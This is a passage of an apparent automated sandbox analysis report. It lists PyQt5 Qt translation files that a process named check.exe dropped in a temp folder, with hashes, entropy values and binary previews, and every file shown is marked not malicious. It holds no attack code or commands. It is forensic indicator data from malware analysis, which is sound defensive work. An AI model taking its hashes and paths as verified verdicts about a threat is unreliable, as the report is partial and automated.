SSDEEP:	3:j2wZC4C/fVFlAlHekUsplY1MUcM/hlULlI+rwtbWlMpsfl8IPldkO1lPchn:CwY4+9ujUcMrURIRt6aE8oinh
MD5:	D033053C03C3ECFA2AA926E0E674F67F
SHA1:	B4E95F8278121E2549F8BB6B5DAF1496F1738A7D
SHA-256:	3C0CBFD19490D67D1B3B9E944C3A4D9A9E7F87D7AE35E88D5D5A0077349B5B21
SHA-512:	2C7E9E9DBE0B25FBA94A52FE4BCCB1D9FED2A7BD2877DB91F82546C3BC8606280949594227BA0FC1C74C31010E1F573B3A82852BE746EAA4F397140485789136
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......cs....v.....q.t.b.a.s.e._.c.s.....q.t.s.c.r.i.p.t._.c.s.....q.t.m.u.l.t.i.m.e.d.i.a._.c.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.s...........

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_da.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6174817344122334
Encrypted:	false
SSDEEP:	3:j2wZC4C/4Jlr/lAlHekT6hY1MUb6JAlI+rwtbWlMuel3UlIPldkOQtt:Cw7rC+3jUkAIRt6EVUloi9
MD5:	E6A683F4A0883B5B0C7D30B847EF208C
SHA1:	FF2440DBBFE04AD86C6F285426AAFD49A895B128
SHA-256:	B5036161CE808C728E5FDA985F792DB565831FD01CF00B282547790C037353A2
SHA-512:	D73B794A71DFD3A3C06BF43ED109F635B4960F9A3904FB728873AB5251BDF6A791DDFDEBA884A2703A35461E18BA902804095AC4B92A2C9361526469B6D35FFA
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......da....v.....q.t.b.a.s.e._.d.a.....q.t.s.c.r.i.p.t._.d.a.....q.t.m.u.l.t.i.m.e.d.i.a._.d.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.a.......

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_de.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6174817344122334
Encrypted:	false
SSDEEP:	3:j2wZC4C/8rJFlAlHekTul01MUbul4LlI+rwtbWlMuallyIPldkOknt:Cw/rJ4+XU5RIRt6Aaoi7t
MD5:	06168E1261BF72F49F94927723B2E1EB
SHA1:	DEAF1B53C3FEE6CB28840418D0060AFA4D59D3FC
SHA-256:	5805B8FF3747849794E2D70661D737C69C15F1AE763C38E17084B1E5A81E9153
SHA-512:	AA3915C029C74DC270514C7F50E8BEC06C825F278E0DE0477AD8ED3187700BBD7711382A6E47C3AC76AC756CEFF9FA8CDD4E9B9DAC817475BC122F78B02C7D7D
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......de....v.....q.t.b.a.s.e._.d.e.....q.t.s.c.r.i.p.t._.d.e.....q.t.m.u.l.t.i.m.e.d.i.a._.d.e... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.e.......

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_en.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:j2wZC4n:CwZ
MD5:	BCEBCF42735C6849BDECBB77451021DD
SHA1:	4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
SHA-256:	9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
SHA-512:	F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`...

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_es.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6070658648473097
Encrypted:	false
SSDEEP:	3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
MD5:	EE47DFADBA4414FDC051C5CFBE71DDC1
SHA1:	DE650E96A9C130D35F8A498202773EF7FC875D27
SHA-256:	E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
SHA-512:	8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_fa.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	293121
Entropy (8bit):	5.272179385890926
Encrypted:	false
SSDEEP:	3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
MD5:	F9C3624197ACB30A9E6CC799BB65BED6
SHA1:	D715EAE24387DE15588F68C92991A93FAFB5EEAB
SHA-256:	B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
SHA-512:	199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......faB..I....*...u...+...............@.......A...J...B.......C...X...D.......E.......F...%...G.......H...0...I.......P...v...Q.......R.......S.......T..."...U.......V...h...W.......X...s...Y.......]..e....t...................-.......W.......\|.......i...;..Eu...;..Z....;...]...;..c....;.......;..0]...M..f....O.......O..2.......#....}..f=...m..fg.........(5......+;..1a..+;...V..+;...!..+O..17..+O...(..1.......E@......F....u..H4......HY...Y..H....S..I....5..I@.....IA......IC......J...1...J.......J.......J...\|...K...6...LD......L.......PS......R....Z..T.......Zr.. ...[`...O..[`......\...%@..\...2..._...&l.._...38..1........E..........2u..........1.......1...........@......4G...........................$...L...$..xY...[.......,...u...y...y...y..z.......F.......<.......g.......5W...........9...........f...E...U...E../....E..................0-...%..6....%.........................3......f..........5...?...0..EK...0......0..L ...0..c....0.......0...Z...5...........Y.. D

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_fi.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	117
Entropy (8bit):	3.739162292019161
Encrypted:	false
SSDEEP:	3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
MD5:	72882942B07B8AAC98034016E752B1A0
SHA1:	BF23B4C136B863B10E770019A2DF62FC988859DF
SHA-256:	048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
SHA-512:	403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_fr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.680458675741643
Encrypted:	false
SSDEEP:	3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
MD5:	3C45C665CFE036A7474CB4DCBB13CF40
SHA1:	62312DFF3C4CD38BAE8456C981601D0D89600F63
SHA-256:	8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
SHA-512:	21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_gd.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.463523104731333
Encrypted:	false
SSDEEP:	3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
MD5:	A8D55457C0413893F746D40B637F9C93
SHA1:	25123615482947772176E055E4A74043B2FBCAA0
SHA-256:	49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
SHA-512:	99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_gl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	323590
Entropy (8bit):	4.568068046062524
Encrypted:	false
SSDEEP:	3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
MD5:	0661FFABFBC50187F3BA38876B721946
SHA1:	EB5E7205355CFC6BCB4DF27E224079842C97B296
SHA-256:	204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
SHA-512:	65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gl_ESB..I...........+..&............@.......A...z...B.......C...p...D.......E......F...!...G......H.......I......P...@...Q.......R......S...5...T......U...+...V.......W...a...X.......Y...N...]..o....t..,................F.......p..............4....;..LI...;..bD...;.......;.......;.......;..cJ...M..o1...O..G....O..e.......U....}..oY...m..o........D..(5...X..+;..6/..+;...~..+;......+O..6...+O...N..1......E@...?..F.......H4..'...HY......H...3`..I......I@......IA......IC..0...J...P...J...1...J...0...J.......K...:...LD..2...L...3...PS..:A..R... d..T.......Zr..Rd..[`......[`.....\...WK..\...RR.._...X..._...f...1........E...{......7M..........1.......1....q......O.......9......................)....$... ...$.......[..,=...,..-....y..0X...y...~......Mx......]0.......H......:A......0....9...............E...o...E..b....E.........1.......c....%..;....%...;......3.......^......S................5..4Z...0..L....0.......0..n....0.......0..7....0.......5..9D......!g.

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_he.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	83
Entropy (8bit):	3.880645689209568
Encrypted:	false
SSDEEP:	3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
MD5:	DD5C2C6B148F2DB3E666B859776AE129
SHA1:	8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
SHA-256:	C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
SHA-512:	2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_ar.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	8743
Entropy (8bit):	5.189558605179696
Encrypted:	false
SSDEEP:	192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
MD5:	CCD39A7C8139AD041E31B3E5D40968B4
SHA1:	5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
SHA-256:	222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
SHA-512:	9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......arB.....(.....d.0T.....5w......Uj....!.`.....M.a[............n..t..............39....&................B<s...V..M^...e......4.O5^...r..)^......o>...........?...t.....D ......k.N.....k.N...C...n...T...I...R..........2>.................\|..G.......w....T.......l..........,................^............$a......6.>...........x..K......W.b....._Xn......GN...m..~......!.....J.K.H.............pN.............P.~.....o.....W..(.......~......s.>......%c.....o.....R.z.q..........................n.h................e.....i..........:.J.1. .E.3.E.Q.I..........Untitled.....QHelp.....8..9.0.Q.1. .F.3... .E.D.A.Q. .'.D..Q.,.E.J.9.).:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler........9.0.Q.1. .%.F.4.'.!. .'.D./.Q.D.J.D.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....>..9.0.Q.1. .%.F.4.'.!. .,./.'.H.D. .A.J. .'.D.E.D.A.Q. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....L..9.0.Q.1. .*.

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_bg.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10599
Entropy (8bit):	5.192287379770591
Encrypted:	false
SSDEEP:	192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
MD5:	5538049DA3A1D1D724AB6E11D2E2EDBE
SHA1:	7256BE390B88A053C0252488C443BE42F6F2D92A
SHA-256:	CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
SHA-512:	DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......bgB...(.(.......0T......5w... S.Uj......`.......a[....(..........t..............39..........&..........B<s...4..M^..........q...J..%..O5^...O..)^...I..o>...I...J..%.......#....t...A.8dz..$..D ....Z.k.N...<.k.N.......n.......I..............2>...p................G..."...w....................7..,................^............$a....<.6.>..........#...K...........$1.W.b....._Xn......GN...*..~....-..TH.."..!.....5.K.H..#R.........pN..."......&..P.~...@.o.....v..(.........."8..~......s.>.....o.... ..z.q..........................O.h....!t..........e....mi..'.....\|.(...@.8.G.8.=.0.B.0. .<.>.6.5. .4.0. .5.,. .G.5. .4.>.:.C.<.5.=.B.0.F.8.O.B.0. .2.A.5. .>.I.5. .A.5. .8.=.4.5.:.A.8.@.0...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........0.1.5.;.5.6.:.0.:..........Note:.....QCLuceneResultWidget.....,. .5.7.C.;.B.0.B.8. .>.B. .B.J.@.A.5.=.5.B.>..........Search Results.....QCLuceneResultWidget....... .

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_ca.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7444
Entropy (8bit):	4.580794980254807
Encrypted:	false
SSDEEP:	192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
MD5:	66722ED97BCBFD3DAE3C8264413859AB
SHA1:	400A93B213FCF9BBC9785881EA82ADB9F444CD6C
SHA-256:	ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
SHA-512:	B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......caB............%.......0T......K:^.....Uj......`.....P..YJ...V.E.4...*...........>...7........B<s.....B\>...6........+.s.....zq.......9.......vR......@.......@.......:....;.8Z....!.g.N......F................t.....D ....z.k.N.......I......^......`#.......2.......G........N...7......N......{..................K...............GN......NO...5.........K.H...@.........pN......V............q..................>...N.........~.....5..%c...:.z.q....i...4....".A.f.e.g.e.i.x. .u.n. .f.i.l.t.r.e..........Add Filter.....FilterNameDialogClass.......N.o.m. .d.e.l. .f.i.l.t.r.e.:..........Filter Name:.....FilterNameDialogClass.......S.e.n.s.e. .t...t.o.l..........Untitled.....QHelp.....`.N.o. .s.'.h.a. .p.o.g.u.t. .c.o.p.i.a.r. .e.l. .f.i.t.x.e.r. .d.e. .c.o.l...l.e.c.c.i...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....H.N.o. .s.'.h.a. .p.o.g.u.t. .c.r.e.a.r. .e.l. .d.i.r.e.c.t.o.r.i.:. .%.1..........Cannot create directory: %1.....QHelpCollect

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_cs.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	15297
Entropy (8bit):	4.708378368926237
Encrypted:	false
SSDEEP:	384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
MD5:	ED228F0F60AE9AEC28AB9171D5AE9590
SHA1:	7F061CF0C699D125A5531E3480C21964452F45EA
SHA-256:	4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
SHA-512:	794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......cs_CZB...H.(.......(.......0T......0T......5w...0..Uj......`.......a[......a[....$.......p..........t.......t...........!..1"....T.39....T.39.......s...0......(......7/.................B<s...L..MQ......M^../q..........J..6@.0....B.O5Q..'..O5^..(A..)Q...X..)^......o>..........+....J..6.......4....t.....8dz..5..D ....R.D ......k.A.....k.A.....k.N.....k.N.......n.."....I..........................2...21......2>..........d.............T..G...4...w...!N......&O......&....!..".......#E..,...,.......)....Q..$/...^..$................$a......6.>.. t......5...K.......K....)......5E.W.b..-.._Xa..%a._Xn..%...GA......GN...?......,9..~.......TH..3..!......K.H..4h.........pA...J..pN..........7..P.~.. ..o.....0..(....*..(..........3V..~....T.s.1.....s.>..._.o....0..o....1p.z.q..........'9.....#........^.........h....2................Z..e... .i..8J......(.D.o.v.o.d.e.m. .p.r.o. .t.o. .b.y. .m.o.h.l.o. .b...t.,. .~.e. .d.o.k.u.m.e.n.t.a.c.e. .j.e. .s.t...l.e. .j.e.a.t...

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_da.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	4795
Entropy (8bit):	4.530246422531362
Encrypted:	false
SSDEEP:	96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
MD5:	1D09BEE1FB55A173F7EB39B9A662A170
SHA1:	C77F0A148262A91679F19689E4790B754D45D5D5
SHA-256:	6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
SHA-512:	BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......daB.....%.....m.0T......Uj....V.`....................k.B<s.....B\>..........6.+.s...............t.....D ....\|.k.N...9...I...O..2.......G....B...N...O..............!..K...._..........GN...........@.K.H.............pN..............>.....~.....m..%c.....z.q....i..........U.n.a.v.n.g.i.v.e.t..........Untitled.....QHelp.....D.K.a.n. .i.k.k.e. .k.o.p.i.e.r.e. .s.a.m.l.i.n.g.s.f.i.l.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....6.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .m.a.p.p.e.n.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....V.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .i.n.d.e.k.s.t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1...........&Cannot create index tables in file %1......QHelpCollectionHandler.....J.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....P.K.a.n. .i.k.k.e. .i.n.d.l...s.e. .s.q.l.i.t.e.-.d.a.t.a.b.a.s.e.-.d.r

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_de.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7570
Entropy (8bit):	4.550982634910665
Encrypted:	false
SSDEEP:	96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
MD5:	3B070D169E3381E2FB081172934AAD00
SHA1:	70886EB7EF566B296D0814BD4C2440AC176699D6
SHA-256:	9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
SHA-512:	271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......deB..........B.%.....5.0T......K:^.....Uj....?.`.....f..YJ...V.E.4...............>............B<s...z.B\>...\........+.s...Q.zq....C..9....4..vR...B..@.......@.......:......8Z......g.N......F....>...........t.....D ......k.N.......I......^....\|.`#....I..2....<..G....^...N.........................;..........K....y..........GN......NO...........,.K.H.............pN......V...................."..........>.............~........%c.....z.q....i........".F.i.l.t.e.r. .h.i.n.z.u.f...g.e.n..........Add Filter.....FilterNameDialogClass.....".N.a.m.e. .d.e.s. .F.i.l.t.e.r.s.:..........Filter Name:.....FilterNameDialogClass.......O.h.n.e. .T.i.t.e.l..........Untitled.....QHelp.....\.D.i.e. .K.a.t.a.l.o.g.d.a.t.e.i. .k.a.n.n. .n.i.c.h.t. .k.o.p.i.e.r.t. .w.e.r.d.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....\.D.a.s. .V.e.r.z.e.i.c.h.n.i.s. .k.a.n.n. .n.i.c.h.t. .a.n.g.e.l.e.g.t. .w.e.r.d.e.n.:. .%.1..........Cannot create directory: %

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_en.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:j2wZC4n:CwZ
MD5:	BCEBCF42735C6849BDECBB77451021DD
SHA1:	4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
SHA-256:	9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
SHA-512:	F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`...

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_es.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10704
Entropy (8bit):	4.481291573289571
Encrypted:	false
SSDEEP:	192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
MD5:	9EDF433AB9EE5FC7CF7782370150B26A
SHA1:	A918AE15A0DF187C7789BE8599A80E279F039964
SHA-256:	FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
SHA-512:	88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......es_ESB...(.(.....7.0T..../.5w... C.Uj......`.......a[....0..........t..............39..........&e.........B<s...D..M^..............J..%p.O5^...I..)^...1..o>.......J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>....................G...#...w............!.......%..,................^............$a......6.>..........#...K...........$C.W.b....._Xn......GN...\|..~.......TH.."..!.....5.K.H..#f.........pN...j......'..P.~... .o........(....>....."<..~....c.s.>.....o.... ..z.q..........................u.h....!p.......*..e....Qi..'}......(.L.a. .r.a.z...n. .d.e. .e.s.t.o. .p.u.e.d.e. .s.e.r. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n. .e.s.t... .s.i.e.n.d.o. .i.n.d.e.x.a.d.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....2.R.e.s.u.l.t.a.d.o.s. .d.e. .l.a. .B...s.q.u.e.d.a..........Search Results.....QCLu

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_fr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10922
Entropy (8bit):	4.459946393010639
Encrypted:	false
SSDEEP:	192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
MD5:	D520C7F85CC06C66715A2B6622BF0687
SHA1:	47292D068172FBC9DC0D9BE2F479E890A37CE138
SHA-256:	687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
SHA-512:	736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fr_FRB...(.(.....y.0T....K.5w...!1.Uj....*.`.......a[............5..t..............39....m.....'W.......S.B<s...d..M^.. ...........J..&`.O5^...+..)^......o>.......J..&.......$....t.....8dz..%..D ......k.N.....k.N...D...n.......I...........c..2>..........M.........G...$...w....K..................,................^............$a......6.>...c......$...K....'......%M.W.b....._Xn...j..GN......~.......TH..#..!.......K.H..$Z......,..pN..........'..P.~.....o........(....h.....#4..~......s.>...M.o....!..z.q...........p......L.........h...."^.......b..e.....i..(W......(.I.l. .e.s.t. .p.o.s.s.i.b.l.e. .q.u.e. .c.e.l.a. .s.o.i.t. .d... .a.u. .f.a.i.t. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.t.i.o.n. .e.s.t. .e.n. .c.o.u.r.s. .d.'.i.n.d.e.x.a.t.i.o.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.e. .:..........Note:.....QCLuceneResultWidget.....2.R...s.u.l.t.a.t.s. .d.e. .l.a. .r.e.c.h.e.r.c.h.e.

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_gl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10891
Entropy (8bit):	4.5087667371046205
Encrypted:	false
SSDEEP:	192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
MD5:	B62C74793741FC386332A59113E8D412
